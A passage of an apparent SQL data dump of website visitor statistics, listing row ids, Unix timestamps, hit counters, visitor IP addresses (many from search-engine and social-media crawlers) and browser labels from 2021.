66.249.70.61',''),(557352,1627614124,1,1,0,0,'109.70.106.130','other'),(557353,1627663948,1,1,0,0,'66.249.70.59','chrome'),(557354,1627668295,4,4,0,0,'109.70.104.23','chrome'),(557355,1627668753,1,1,0,0,'144.86.173.149','other'),(557356,1627673064,1,1,0,0,'66.249.70.61','chrome'),(557357,1627677232,1,1,0,0,'92.119.161.234','firefox'),(557358,1627677233,1,1,0,0,'92.119.161.234','other'),(557359,1627684063,3,3,0,0,'66.249.70.57','chrome'),(557360,1627684068,3,3,0,0,'66.249.70.59','chrome'),(557361,1627684281,2,2,0,0,'66.249.70.61','chrome'),(557362,1627685580,1,1,0,0,'66.249.70.59','chrome'),(557363,1627685723,1,1,0,0,'66.249.70.57','chrome'),(557364,1627686576,1,0,1,0,'66.249.70.59',''),(557365,1627687498,1,1,0,0,'66.249.70.57','chrome'),(557366,1627689820,1,1,0,0,'66.249.70.59','chrome'),(557367,1627691378,1,1,0,0,'66.249.70.57','chrome'),(557368,1627698013,1,1,0,0,'92.119.161.245','chrome'),(557369,1627698014,1,1,0,0,'92.119.161.245','firefox'),(557370,1627712402,1,1,0,0,'42.236.10.114','chrome'),(557371,1627712444,1,1,0,0,'42.236.10.106','chrome'),(557372,1627713260,1,1,0,0,'42.236.10.78','chrome'),(557373,1627713288,1,1,0,0,'42.236.10.93','chrome'),(557374,1627713927,1,0,1,0,'66.249.70.57',''),(557375,1627715081,1,1,0,0,'124.126.78.140','chrome'),(557376,1627715272,1,1,0,0,'66.33.212.126','firefox'),(557377,1627718820,2,2,0,0,'92.119.161.245','other'),(557378,1627726432,1,0,1,0,'66.249.70.59',''),(557379,1627728978,1,1,0,0,'66.249.70.57','chrome'),(557380,1627747439,3,3,0,0,'162.241.127.73','firefox'),(557381,1627749003,1,1,0,0,'95.163.36.5','other'),(557382,1627750518,1,1,0,0,'95.163.36.8','other'),(557383,1627750769,1,1,0,0,'95.163.36.9','other'),(557384,1627751940,1,1,0,0,'95.163.36.14','other'),(557385,1627760545,1,1,0,0,'69.63.184.113','other'),(557386,1627773585,1,1,0,0,'66.249.70.61','chrome'),(557387,1627784458,2,2,0,0,'92.119.161.209','chrome'),(557388,1627784613,1,0,1,0,'66.249.70.61',''),(557389,1627792849,1,1,0,0,'66.249.70.57','chrome'),(557390,1627803987,1,1,0,0,'142.54.177.4','chrome'),(557391,1627806513,1,1,0,0,'31.13.103.118','other'),(557392,1627811072,1,0,1,0,'66.249.70.57',''),(557393,1627812350,1,1,0,0,'173.252.111.5','other'),(557394,1627813471,1,0,1,0,'66.249.70.59',''),(557395,1627817336,1,1,0,0,'185.237.217.11','chrome'),(557396,1627821498,1,1,0,0,'77.88.5.163','other'),(557397,1627821574,1,1,0,0,'77.88.5.29','other'),(557398,1627822299,1,1,0,0,'66.249.70.59','chrome'),(557399,1627826307,1,1,0,0,'66.249.70.59','chrome'),(557400,1627835782,1,0,1,0,'66.249.70.61',''),(557401,1627837766,1,1,0,0,'31.13.103.4','other'),(557402,1627837767,1,1,0,0,'31.13.103.24','other'),(557403,1627837846,1,1,0,0,'185.237.217.11','chrome'),(557404,1627840370,1,1,0,0,'92.118.160.45','other'),(557405,1627844578,1,0,1,0,'66.249.70.59',''),(557406,1627847048,1,1,0,0,'173.252.111.23','other'),(557407,1627849434,1,1,0,0,'46.211.39.255','chrome'),(557408,1627849738,1,1,0,0,'31.134.77.46','chrome'),(557409,1627870027,1,1,0,0,'66.249.70.57','chrome'),(557410,1627870832,1,1,0,0,'92.119.161.213','firefox'),(557411,1627870833,1,1,0,0,'92.119.161.213','other'),(557412,1627875693,1,1,0,0,'92.118.160.61','other'),(557413,1627880759,1,1,0,0,'92.118.160.5','other'),(557414,1627887062,1,1,0,0,'66.249.70.57','chrome'),(557415,1627897487,1,0,1,0,'66.249.70.61',''),(557416,1627905711,1,0,1,0,'66.249.70.59',''),(557417,1627930042,1,1,0,0,'66.249.70.57','chrome'),(557418,1627932553,1,1,0,0,'92.118.160.61','other'),(557419,1627933553,1,0,1,0,'66.249.70.57',''),(557420,1627954181,1,1,0,0,'45.129.18.227','chrome'),(557421,1627957265,1,1,0,0,'92.119.161.242','firefox'),(557422,1627957269,1,1,0,0,'92.119.161.242','other'),(557423,1627968524,1,0,1,0,'66.249.70.57',''),(557424,1627984592,1,0,1,0,'66.249.70.61',''),(557425,1627987068,1,1,0,0,'100.21.218.158','firefox'),(557426,1627998359,1,1,0,0,'66.249.70.59','chrome'),(557427,1628001028,1,0,1,0,'66.249.70.59',''),(557428,1628014650,1,1,0,0,'66.249.70.57','chrome'),(557429,1628014678,1,1,0,0,'66.249.70.59','chrome'),(557430,1628022043,1,1,0,0,'173.252.111.22','other'),(557431,1628028497,1,0,1,0,'66.249.70.57',''),(557432,1628029049,1,1,0,0,'66.249.70.59','chrome'),(557433,1628032734,1,1,0,0,'66.249.70.59','chrome'),(557434,1628040836,1,1,0,0,'66.249.70.57','chrome'),(557435,1628041486,1,1,0,0,'134.122.41.107','chrome'),(557436,1628042871,1,1,0,0,'66.249.70.59','chrome'),(557437,1628043692,2,2,0,0,'92.119.161.235','chrome'),(557438,1628063802,1,0,1,0,'66.249.70.57',''),(557439,1628069584,1,1,0,0,'144.86.173.153','other'),(557440,1628075432,1,1,0,0,'173.252.111.1','other'),(557441,1628077459,1,1,0,0,'157.245.117.30','other'),(557442,1628099591,1,1,0,0,'91.196.178.207','chrome'),(557443,1628103124,1,1,0,0,'173.252.111.20','other'),(557444,1628112541,1,1,0,0,'66.249.70.41','chrome'),(557445,1628120635,2,2,0,0,'42.236.10.75','chrome'),(557446,1628120662,2,2,0,0,'42.236.10.93','chrome'),(557447,1628120909,1,1,0,0,'42.236.10.106','chrome'),(557448,1628120936,2,2,0,0,'42.236.10.117','chrome'),(557449,1628130996,1,1,0,0,'66.249.70.59','chrome'),(557450,1628147959,1,0,1,0,'66.249.70.41',''),(557451,1628155794,1,0,1,0,'66.249.70.41',''),(557452,1628159987,1,1,0,0,'66.249.70.39','chrome'),(557453,1628161300,1,0,1,0,'66.249.70.39',''),(557454,1628161438,2,2,0,0,'66.249.70.41','chrome'),(557455,1628171554,1,0,1,0,'66.249.70.41',''),(557456,1628171558,1,0,1,0,'66.249.70.39',''),(557457,1628178314,1,1,0,0,'88.155.34.105','chrome'),(557458,1628180873,1,0,1,0,'66.249.70.37',''),(557459,1628185331,1,1,0,0,'159.203.109.146','other'),(557460,1628188826,1,0,1,0,'66.249.70.41',''),(557461,1628189034,1,1,0,0,'64.225.53.60','other'),(557462,1628189323,1,1,0,0,'66.249.70.41','chrome'),(557463,1628190032,1,1,0,0,'92.119.162.34','other'),(557464,1628196521,1,1,0,0,'66.249.70.41','chrome'),(557465,1628203993,1,0,1,0,'66.249.70.37',''),(557466,1628214860,1,1,0,0,'31.13.103.3','other'),(557467,1628223685,1,1,0,0,'66.249.70.37','chrome'),(557468,1628232853,1,1,0,0,'66.249.70.39','chrome'),(557469,1628240535,1,0,1,0,'66.249.70.39',''),(557470,1628247129,1,0,1,0,'66.249.70.41',''),(557471,1628272100,1,1,0,0,'66.249.70.37','chrome'),(557472,1628274861,1,1,0,0,'173.252.111.11','other'),(557473,1628282118,1,0,1,0,'66.249.70.39',''),(557474,1628286638,1,0,1,0,'66.249.70.39',''),(557475,1628286674,1,0,1,0,'66.249.70.37',''),(557476,1628295029,1,1,0,0,'66.249.70.39','chrome'),(557477,1628302916,1,1,0,0,'66.249.70.41','chrome'),(557478,1628305996,1,0,1,0,'66.249.70.59',''),(557479,1628309383,1,0,1,0,'66.249.70.59',''),(557480,1628313387,1,1,0,0,'51.15.195.246','other'),(557481,1628329746,1,0,1,0,'66.249.70.37',''),(557482,1628347836,1,0,1,0,'66.249.70.41',''),(557483,1628350540,1,0,1,0,'66.249.70.41',''),(557484,1628350616,1,1,0,0,'66.249.70.39','chrome'),(557485,1628350769,1,1,0,0,'66.249.70.37','chrome'),(557486,1628361292,1,1,0,0,'66.249.70.59','chrome'),(557487,1628373110,1,1,0,0,'51.15.251.143','other'),(557488,1628403064,1,1,0,0,'66.249.70.57','chrome'),(557489,1628405744,2,2,0,0,'128.124.1.234','chrome'),(557490,1628407398,1,0,1,0,'66.249.70.55',''),(557491,1628415119,1,1,0,0,'66.249.70.59','chrome'),(557492,1628416013,1,0,1,0,'66.249.70.57',''),(557493,1628417432,2,2,0,0,'37.53.125.64','chrome'),(557494,1628419172,1,1,0,0,'66.249.70.59','chrome'),(557495,1628426871,1,1,0,0,'176.121.8.161','other'),(557496,1628429417,1,1,0,0,'66.249.70.59','chrome'),(557497,1628435550,1,1,0,0,'173.252.111.119','other'),(557498,1628435551,1,1,0,0,'173.252.111.10','other'),(557499,1628435552,1,1,0,0,'173.252.111.117','other'),(557500,1628435576,1,1,0,0,'173.252.111.17','other'),(557501,1628435577,1,1,0,0,'173.252.111.3','other'),(557504,1628435578,1,1,0,0,'173.252.111.22','other'),(557507,1628435591,1,1,0,0,'173.252.111.118','other'),(557509,1628435592,1,1,0,0,'173.252.111.20','other'),(557510,1628440694,1,1,0,0,'173.252.111.10','other'),(557511,1628477695,1,1,0,0,'92.118.160.57','other'),(557512,1628483078,1,1,0,0,'31.13.115.2','other'),(557513,1628496489,1,1,0,0,'45.129.18.237','chrome'),(557514,1628498219,3,3,0,0,'193.107.109.250','chrome'),(557516,1628502291,1,0,1,0,'66.249.70.59',''),(557517,1628502295,1,0,1,0,'66.249.70.55',''),(557518,1628509382,1,1,0,0,'66.249.70.55','chrome'),(557519,1628511875,1,1,0,0,'160.238.127.197','chrome'),(557520,1628519345,1,0,1,0,'66.249.70.55',''),(557521,1628522640,1,1,0,0,'66.249.70.55','chrome'),(557522,1628526802,1,1,0,0,'92.118.160.13','other'),(557523,1628526990,1,1,0,0,'66.249.70.59','chrome'),(557524,1628532357,1,1,0,0,'66.249.70.57','chrome'),(557525,1628534290,2,2,0,0,'66.249.70.57','chrome'),(557526,1628534560,1,1,0,0,'66.249.70.55','chrome'),(557527,1628537404,1,1,0,0,'66.249.70.59','chrome'),(557528,1628558658,1,1,0,0,'66.249.70.41','chrome'),(557529,1628559984,1,0,1,0,'66.249.70.41',''),(557530,1628570466,2,2,0,0,'23.228.109.147','other'),(557531,1628577236,1,1,0,0,'173.252.107.118','other'),(557532,1628579665,2,2,0,0,'23.228.109.147','other'),(557533,1628588825,1,0,1,0,'66.249.70.39',''),(557534,1628590211,1,1,0,0,'89.184.66.143','firefox'),(557535,1628590524,2,2,0,0,'23.228.109.147','other'),(557536,1628599136,1,1,0,0,'103.226.226.131','other'),(557537,1628616591,1,1,0,0,'173.252.111.119','other'),(557538,1628616600,1,1,0,0,'173.252.111.23','other'),(557539,1628616605,1,1,0,0,'173.252.111.112','other'),(557540,1628616628,1,1,0,0,'173.252.111.19','other'),(557541,1628616629,1,1,0,0,'173.252.111.1','other'),(557542,1628622751,3,3,0,0,'182.16.179.70','firefox'),(557543,1628633299,1,0,1,0,'66.249.70.39',''),(557545,1628656656,2,2,0,0,'103.42.58.102','firefox'),(557546,1628661933,1,1,0,0,'88.155.16.71','chrome'),(557547,1628673136,1,1,0,0,'69.171.251.111','other'),(557548,1628675209,1,0,1,0,'66.249.70.39',''),(557549,1628676238,1,1,0,0,'69.171.249.16','other'),(557550,1628676453,1,1,0,0,'173.252.111.11','other'),(557551,1628680999,2,2,0,0,'173.252.111.9','other'),(557552,1628681008,1,1,0,0,'173.252.111.119','other'),(557553,1628681009,1,1,0,0,'173.252.111.116','other'),(557554,1628681071,1,1,0,0,'173.252.111.14','other'),(557555,1628681075,1,1,0,0,'69.171.249.112','other'),(557556,1628681086,1,1,0,0,'173.252.111.16','other'),(557557,1628683037,2,2,0,0,'54.189.230.128','firefox'),(557558,1628699640,3,3,0,0,'173.236.184.113','firefox'),(557559,1628700036,1,1,0,0,'66.249.70.39','chrome'),(557560,1628702626,1,1,0,0,'138.199.59.143','chrome'),(557561,1628705178,1,0,1,0,'66.249.70.41',''),(557562,1628705710,2,2,0,0,'157.245.55.146','firefox'),(557564,1628706533,1,0,1,0,'66.249.70.41',''),(557565,1628715691,1,0,1,0,'66.249.70.41',''),(557566,1628740762,1,1,0,0,'66.249.70.41','chrome'),(557567,1628744919,1,1,0,0,'64.246.161.30','firefox'),(557568,1628748727,1,0,1,0,'66.249.70.41',''),(557569,1628761619,1,0,1,0,'66.249.70.39',''),(557570,1628779308,1,1,0,0,'74.125.151.39','other'),(557571,1628782796,1,0,1,0,'66.249.70.41',''),(557572,1628789122,2,1,1,0,'66.249.70.39',''),(557573,1628806434,1,1,0,0,'66.249.70.39','chrome'),(557574,1628812766,1,1,0,0,'173.252.87.13','other'),(557575,1628812810,1,1,0,0,'173.252.87.1','other'),(557576,1628830591,1,1,0,0,'66.249.70.39','chrome'),(557577,1628836321,1,1,0,0,'185.237.217.17','chrome'),(557578,1628847944,1,0,1,0,'66.249.70.37',''),(557579,1628876550,1,1,0,0,'66.249.70.41','chrome'),(557580,1628878736,1,1,0,0,'66.249.70.37','chrome'),(557581,1628881786,1,1,0,0,'66.249.70.41','chrome'),(557582,1628887412,1,1,0,0,'66.249.70.39','chrome'),(557583,1628890653,1,1,0,0,'66.249.70.39','chrome'),(557584,1628907947,1,0,1,0,'66.249.70.37',''),(557585,1628934335,1,0,1,0,'66.249.70.41',''),(557586,1628950908,2,2,0,0,'176.118.146.255','chrome'),(557587,1628972147,1,0,1,0,'66.249.70.41',''),(557588,1629020804,1,0,1,0,'66.249.70.39',''),(557589,1629050697,1,0,1,0,'66.249.70.39',''),(557590,1629054546,1,1,0,0,'213.180.203.24','other'),(557591,1629066568,1,1,0,0,'104.248.42.100','firefox'),(557592,1629070497,1,1,0,0,'31.13.103.8','other'),(557593,1629070498,1,1,0,0,'31.13.103.22','other'),(557597,1629071109,1,1,0,0,'31.13.103.14','other'),(557598,1629071110,1,1,0,0,'31.13.103.12','other'),(557599,1629074097,1,0,1,0,'66.249.70.37',''),(557600,1629086470,1,0,1,0,'66.249.70.37',''),(557601,1629087184,1,1,0,0,'92.119.161.241','chrome'),(557602,1629087185,1,1,0,0,'92.119.161.241','other'),(557603,1629107592,1,1,0,0,'194.53.197.64','chrome'),(557604,1629148391,1,1,0,0,'176.118.147.139','chrome'),(557606,1629151765,1,1,0,0,'69.171.249.116','other'),(557607,1629151786,1,1,0,0,'69.171.249.10','other'),(557608,1629172096,1,1,0,0,'66.249.70.41','chrome'),(557609,1629188266,2,2,0,0,'46.211.61.204','chrome'),(557610,1629193575,1,0,1,0,'66.249.70.41',''),(557611,1629199962,1,0,1,0,'66.249.70.39',''),(557612,1629200770,1,1,0,0,'31.13.103.5','other'),(557613,1629201817,1,1,0,0,'94.153.40.73','chrome'),(557614,1629202021,1,1,0,0,'173.252.111.1','other'),(557617,1629202022,1,1,0,0,'173.252.111.15','other'),(557618,1629202025,2,2,0,0,'173.252.111.23','other'),(557619,1629202026,1,1,0,0,'173.252.111.116','other'),(557620,1629202037,1,1,0,0,'173.252.111.6','other'),(557622,1629202038,1,1,0,0,'173.252.111.10','other'),(557623,1629202039,1,1,0,0,'31.13.103.19','other'),(557624,1629202041,1,1,0,0,'173.252.111.21','other'),(557625,1629202151,1,1,0,0,'31.13.127.5','other'),(557626,1629205131,1,1,0,0,'94.153.40.73','chrome'),(557627,1629218962,1,1,0,0,'173.252.87.112','other'),(557628,1629219115,2,2,0,0,'185.237.217.11','chrome'),(557629,1629219153,1,1,0,0,'185.237.217.11','other'),(557630,1629220735,1,1,0,0,'91.196.178.163','other'),(557631,1629220741,1,1,0,0,'173.252.83.120','other'),(557636,1629220742,1,1,0,0,'173.252.83.14','other'),(557641,1629220765,1,1,0,0,'66.220.149.27','other'),(557642,1629227631,2,2,0,0,'192.162.232.183','chrome'),(557643,1629240896,1,1,0,0,'31.13.127.34','other'),(557644,1629258489,1,1,0,0,'66.249.70.41','chrome'),(557645,1629260869,1,1,0,0,'46.211.30.184','chrome'),(557646,1629261488,1,1,0,0,'31.13.103.120','other'),(557647,1629261491,2,2,0,0,'31.13.103.6','other'),(557649,1629261492,1,1,0,0,'31.13.103.24','other'),(557650,1629261493,1,1,0,0,'31.13.103.19','other'),(557651,1629261495,1,1,0,0,'31.13.103.1','other'),(557652,1629261509,2,2,0,0,'31.13.103.12','other'),(557653,1629261510,1,1,0,0,'31.13.103.7','other'),(557655,1629261511,1,1,0,0,'31.13.103.18','other'),(557656,1629261533,3,3,0,0,'31.13.103.23','other'),(557657,1629261536,2,2,0,0,'31.13.103.10','other'),(557658,1629261625,1,1,0,0,'31.13.103.119','other'),(557659,1629261628,1,1,0,0,'31.13.103.4','other'),(557660,1629261692,1,1,0,0,'31.13.103.3','other'),(557661,1629261694,1,1,0,0,'31.13.103.16','other'),(557662,1629262615,1,1,0,0,'31.13.103.23','other'),(557663,1629276741,1,1,0,0,'173.252.111.18','other'),(557664,1629280030,1,0,1,0,'66.249.70.39',''),(557665,1629290579,1,1,0,0,'173.252.111.13','other'),(557666,1629298607,1,1,0,0,'45.129.18.136','chrome'),(557667,1629310230,1,1,0,0,'91.196.178.207','chrome'),(557668,1629316399,1,1,0,0,'188.163.32.24','chrome'),(557669,1629347343,1,1,0,0,'175.44.42.136','other'),(557670,1629363230,1,1,0,0,'66.249.70.39','chrome'),(557671,1629366521,1,0,1,0,'66.249.70.41',''),(557672,1629379006,1,1,0,0,'66.249.70.39','chrome'),(557673,1629380829,1,0,1,0,'66.249.70.37',''),(557674,1629381195,4,4,0,0,'159.203.37.131','firefox'),(557675,1629385953,2,2,0,0,'192.162.232.183','chrome'),(557676,1629389617,2,2,0,0,'192.162.232.183','chrome'),(557677,1629392140,1,1,0,0,'128.124.143.113','chrome'),(557678,1629396984,1,1,0,0,'173.252.111.20','other'),(557679,1629398199,1,0,1,0,'66.249.70.37',''),(557680,1629399459,1,1,0,0,'173.252.111.1','other'),(557681,1629400984,1,1,0,0,'66.249.70.37','chrome'),(557682,1629402011,2,2,0,0,'185.227.138.227','firefox'),(557684,1629405378,2,2,0,0,'192.162.232.183','chrome'),(557685,1629419929,1,1,0,0,'66.249.70.37','chrome'),(557686,1629432148,2,2,0,0,'31.13.103.2','other'),(557687,1629432149,1,1,0,0,'31.13.103.9','other'),(557689,1629432150,1,1,0,0,'31.13.103.7','other'),(557690,1629434001,1,1,0,0,'66.249.70.39','chrome'),(557691,1629448098,1,0,1,0,'66.249.70.37',''),(557692,1629456908,2,2,0,0,'23.228.109.147','other'),(557693,1629470511,1,1,0,0,'91.196.178.206','chrome'),(557694,1629480072,1,1,0,0,'66.249.66.59','chrome'),(557695,1629482892,1,1,0,0,'66.249.66.61','chrome'),(557696,1629486472,1,0,1,0,'66.249.66.57',''),(557697,1629488854,1,0,1,0,'66.249.66.57',''),(557698,1629510016,2,2,0,0,'137.74.27.104','firefox'),(557699,1629525184,1,1,0,0,'66.249.66.57','chrome'),(557700,1629525357,2,2,0,0,'31.13.127.17','other'),(557701,1629525358,1,1,0,0,'31.13.127.23','other'),(557703,1629537484,1,1,0,0,'66.249.66.61','chrome'),(557704,1629538011,1,1,0,0,'173.252.95.14','other'),(557705,1629539188,1,0,1,0,'66.249.66.61',''),(557706,1629539199,1,0,1,0,'66.249.66.59',''),(557707,1629544127,2,2,0,0,'31.13.103.113','other'),(557708,1629544128,1,1,0,0,'31.13.103.20','other'),(557709,1629544129,2,2,0,0,'31.13.103.19','other'),(557710,1629544181,1,1,0,0,'31.13.103.9','other'),(557713,1629544182,1,1,0,0,'31.13.103.117','other'),(557714,1629544183,1,1,0,0,'31.13.103.15','other'),(557715,1629544207,3,3,0,0,'31.13.103.24','other'),(557716,1629544208,2,2,0,0,'31.13.103.18','other'),(557720,1629544209,1,1,0,0,'31.13.103.14','other'),(557721,1629549101,1,1,0,0,'173.252.111.15','other'),(557722,1629549102,1,1,0,0,'173.252.111.3','other'),(557723,1629549127,1,1,0,0,'173.252.111.14','other'),(557724,1629549128,1,1,0,0,'173.252.111.4','other'),(557725,1629549172,1,1,0,0,'173.252.111.120','other'),(557727,1629549201,1,1,0,0,'173.252.111.23','other'),(557728,1629557218,1,1,0,0,'66.249.66.61','chrome'),(557729,1629559986,2,2,0,0,'91.196.178.41','chrome'),(557730,1629566597,1,1,0,0,'66.249.66.61','chrome'),(557731,1629569843,5,5,0,0,'124.126.78.195','chrome'),(557732,1629584102,1,1,0,0,'66.249.66.61','chrome'),(557733,1629588999,1,1,0,0,'66.249.66.57','chrome'),(557734,1629590438,1,0,1,0,'66.249.66.61',''),(557735,1629607987,1,1,0,0,'66.249.66.61','chrome'),(557736,1629615687,1,0,1,0,'66.249.66.61',''),(557737,1629617419,1,1,0,0,'66.249.66.57','chrome'),(557738,1629618034,1,1,0,0,'66.249.66.59','chrome'),(557739,1629623376,1,1,0,0,'185.237.217.11','chrome'),(557740,1629623393,1,1,0,0,'173.252.111.23','other'),(557741,1629623400,1,1,0,0,'173.252.111.9','other'),(557742,1629623401,1,1,0,0,'173.252.111.3','other'),(557743,1629623402,1,1,0,0,'173.252.111.117','other'),(557744,1629624135,1,0,1,0,'66.249.66.57',''),(557745,1629642737,1,0,1,0,'66.249.66.59',''),(557746,1629646867,1,1,0,0,'31.13.127.5','other'),(557747,1629650951,1,1,0,0,'173.252.111.1','other'),(557748,1629657787,1,1,0,0,'66.249.66.57','chrome'),(557749,1629659387,1,0,1,0,'66.249.66.59',''),(557750,1629662574,3,3,0,0,'109.234.160.26','firefox'),(557751,1629694098,3,3,0,0,'187.51.127.28','firefox'),(557752,1629694676,1,0,1,0,'66.249.66.61',''),(557753,1629700891,1,1,0,0,'173.252.111.116','other'),(557754,1629702063,1,1,0,0,'173.252.111.17','other'),(557755,1629706705,1,1,0,0,'66.249.66.61','chrome'),(557756,1629720295,1,0,1,0,'66.249.66.59',''),(557757,1629722759,1,1,0,0,'173.252.111.6','other'),(557758,1629725825,1,1,0,0,'66.249.70.39','chrome'),(557759,1629732273,1,1,0,0,'66.249.70.37','chrome'),(557760,1629733764,1,0,1,0,'66.249.70.41',''),(557761,1629734461,1,0,1,0,'66.249.70.37',''),(557762,1629735787,1,0,1,0,'66.249.70.39',''),(557763,1629750924,1,0,1,0,'66.249.70.39',''),(557764,1629761809,1,1,0,0,'66.249.70.39','chrome'),(557765,1629763004,2,2,0,0,'31.13.103.120','other'),(557766,1629771144,1,0,1,0,'66.249.70.37',''),(557767,1629785050,1,0,1,0,'66.249.70.41',''),(557768,1629786129,1,1,0,0,'185.237.217.11','chrome'),(557769,1629786671,2,2,0,0,'173.252.111.8','other'),(557772,1629786672,1,1,0,0,'173.252.111.111','other'),(557773,1629786676,2,2,0,0,'173.252.111.119','other'),(557774,1629786680,1,1,0,0,'69.171.249.9','other'),(557775,1629786681,1,1,0,0,'69.171.249.23','other'),(557776,1629786683,1,1,0,0,'173.252.111.16','other'),(557777,1629786687,1,1,0,0,'173.252.111.116','other'),(557778,1629787121,1,1,0,0,'173.252.87.15','other'),(557779,1629787482,2,2,0,0,'185.237.217.11','chrome'),(557780,1629787497,1,1,0,0,'173.252.111.4','other'),(557781,1629787498,1,1,0,0,'173.252.111.17','other'),(557782,1629795668,2,0,2,0,'66.249.70.39',''),(557783,1629799724,1,1,0,0,'173.252.111.120','other'),(557785,1629799725,1,1,0,0,'173.252.111.117','other'),(557790,1629799726,1,1,0,0,'173.252.111.19','other'),(557795,1629804149,2,1,1,0,'66.249.70.37',''),(557796,1629805548,1,1,0,0,'173.252.95.12','other'),(557797,1629805695,1,1,0,0,'185.237.217.11','chrome'),(557798,1629812761,1,1,0,0,'173.252.107.6','other'),(557799,1629819353,1,0,1,0,'66.249.70.41',''),(557800,1629825474,1,1,0,0,'173.252.107.17','other'),(557801,1629842370,1,1,0,0,'91.196.178.118','chrome'),(557802,1629843082,1,0,1,0,'66.249.70.41',''),(557803,1629847036,1,0,1,0,'66.249.70.41',''),(557804,1629866661,1,1,0,0,'66.249.70.41','chrome'),(557805,1629868108,1,1,0,0,'46.211.66.243','chrome'),(557806,1629881194,1,0,1,0,'66.249.70.39',''),(557807,1629886839,1,1,0,0,'198.204.234.252','chrome'),(557808,1629887823,1,0,1,0,'66.249.70.37',''),(557809,1629891223,1,1,0,0,'173.252.111.5','other'),(557810,1629891228,1,1,0,0,'31.13.103.22','other'),(557811,1629891989,1,1,0,0,'173.252.87.6','other'),(557812,1629898926,1,1,0,0,'66.249.70.37','chrome'),(557813,1629908697,1,1,0,0,'207.46.13.104','other'),(557814,1629910287,1,1,0,0,'66.220.149.19','other'),(557815,1629910305,1,1,0,0,'173.252.83.17','other'),(557816,1629921357,1,1,0,0,'173.252.111.17','other'),(557817,1629922470,2,2,0,0,'31.13.115.2','other'),(557818,1629941517,1,1,0,0,'31.13.103.17','other'),(557819,1629941519,1,1,0,0,'173.252.111.8','other'),(557820,1629952972,2,2,0,0,'54.203.73.198','firefox'),(557821,1629960887,1,1,0,0,'162.55.189.180','other'),(557822,1629966119,1,1,0,0,'66.249.70.41','chrome'),(557823,1629967434,1,1,0,0,'185.237.217.11','chrome'),(557824,1629967666,1,0,1,0,'66.249.70.41',''),(557825,1629971337,1,1,0,0,'54.212.216.158','chrome'),(557826,1629972344,6,6,0,0,'20.199.80.222','firefox'),(557827,1629972368,5,5,0,0,'20.199.80.222','chrome'),(557828,1629977218,1,1,0,0,'31.13.127.36','other'),(557829,1629989208,1,1,0,0,'66.249.66.57','chrome'),(557830,1629991623,1,1,0,0,'66.249.66.61','chrome'),(557831,1629993385,1,1,0,0,'44.234.24.92','chrome'),(557832,1629996105,1,1,0,0,'66.249.66.59','chrome'),(557833,1630006739,2,2,0,0,'162.214.163.37','firefox'),(557835,1630040049,1,0,1,0,'66.249.66.59',''),(557836,1630042299,3,3,0,0,'51.132.4.32','firefox'),(557837,1630053970,1,0,1,0,'66.249.66.57',''),(557838,1630055532,1,1,0,0,'173.252.107.18','other'),(557839,1630066124,1,1,0,0,'66.249.70.39','chrome'),(557840,1630069517,2,2,0,0,'73.51.84.175','other'),(557841,1630076114,1,0,1,0,'66.249.70.39',''),(557842,1630080020,1,1,0,0,'31.13.103.22','other'),(557843,1630081022,1,1,0,0,'194.44.57.68','chrome'),(557844,1630088292,1,1,0,0,'66.249.70.41','chrome'),(557845,1630090665,1,1,0,0,'31.13.127.30','other'),(557846,1630095548,1,1,0,0,'66.249.70.41','chrome'),(557847,1630098212,1,1,0,0,'173.252.111.15','other'),(557848,1630098213,2,2,0,0,'173.252.111.118','other'),(557849,1630098214,1,1,0,0,'173.252.111.21','other'),(557851,1630098224,1,1,0,0,'173.252.111.117','other'),(557852,1630098225,1,1,0,0,'173.252.111.3','other'),(557853,1630098226,1,1,0,0,'173.252.111.14','other'),(557854,1630098558,2,0,2,0,'66.249.70.37',''),(557855,1630100191,1,0,1,0,'66.249.70.41',''),(557856,1630102887,1,1,0,0,'94.153.57.51','chrome'),(557857,1630105160,2,2,0,0,'20.199.80.222','firefox'),(557858,1630105178,8,8,0,0,'20.199.80.222','chrome'),(557859,1630105324,1,1,0,0,'20.199.80.222','other'),(557860,1630129158,1,1,0,0,'188.163.18.79','chrome'),(557861,1630129159,1,1,0,0,'31.13.127.11','other'),(557862,1630140245,1,0,1,0,'66.249.70.41',''),(557863,1630149798,1,1,0,0,'91.196.178.169','chrome'),(557864,1630154698,1,1,0,0,'91.196.178.19','chrome'),(557865,1630155211,1,1,0,0,'173.252.111.119','other'),(557866,1630155212,1,1,0,0,'173.252.111.12','other'),(557867,1630158622,1,1,0,0,'45.129.18.18','chrome'),(557868,1630166520,1,1,0,0,'66.249.66.57','chrome'),(557869,1630178754,4,4,0,0,'109.70.111.112','chrome'),(557870,1630182854,1,1,0,0,'94.153.1.231','chrome'),(557871,1630182855,1,1,0,0,'173.252.111.11','other'),(557872,1630197872,1,1,0,0,'149.202.123.250','other'),(557874,1630206546,2,2,0,0,'34.68.97.70','firefox'),(557876,1630222577,1,1,0,0,'66.249.66.57','chrome'),(557877,1630225786,3,3,0,0,'24.172.246.199','firefox'),(557878,1630226734,1,0,1,0,'66.249.66.57',''),(557879,1630227022,1,1,0,0,'173.252.111.14','other'),(557880,1630228572,1,1,0,0,'69.171.249.5','other'),(557881,1630233060,1,1,0,0,'176.118.150.227','chrome'),(557882,1630233782,1,0,1,0,'66.249.66.61',''),(557883,1630234986,1,1,0,0,'173.252.111.4','other'),(557884,1630236626,1,0,1,0,'66.249.66.61',''),(557885,1630238347,1,1,0,0,'91.196.121.134','chrome'),(557886,1630247470,1,1,0,0,'66.249.66.57','chrome'),(557887,1630247696,2,2,0,0,'176.118.150.227','chrome'),(557888,1630250545,1,1,0,0,'173.252.111.22','other'),(557889,1630250546,1,1,0,0,'173.252.111.111','other'),(557890,1630258942,1,1,0,0,'31.13.103.5','other'),(557891,1630262184,1,0,1,0,'66.249.66.59',''),(557892,1630262689,1,1,0,0,'173.252.107.111','other'),(557893,1630265889,1,1,0,0,'31.13.127.29','other'),(557894,1630268617,1,1,0,0,'173.252.111.18','other'),(557895,1630282582,1,1,0,0,'34.217.88.120','firefox'),(557896,1630288934,1,1,0,0,'109.70.106.130','other'),(557897,1630297214,1,1,0,0,'31.13.127.20','other'),(557898,1630303317,1,1,0,0,'80.93.117.58','chrome'),(557899,1630309318,1,1,0,0,'66.249.66.59','chrome'),(557900,1630309769,1,1,0,0,'173.252.111.21','other'),(557901,1630311774,1,0,1,0,'66.249.66.57',''),(557902,1630313730,1,1,0,0,'66.249.66.61','chrome'),(557903,1630320748,1,1,0,0,'173.252.111.15','other'),(557904,1630320759,1,1,0,0,'173.252.111.23','other'),(557910,1630320760,1,1,0,0,'173.252.111.2','other'),(557914,1630320763,1,1,0,0,'173.252.107.113','other'),(557915,1630343005,1,1,0,0,'7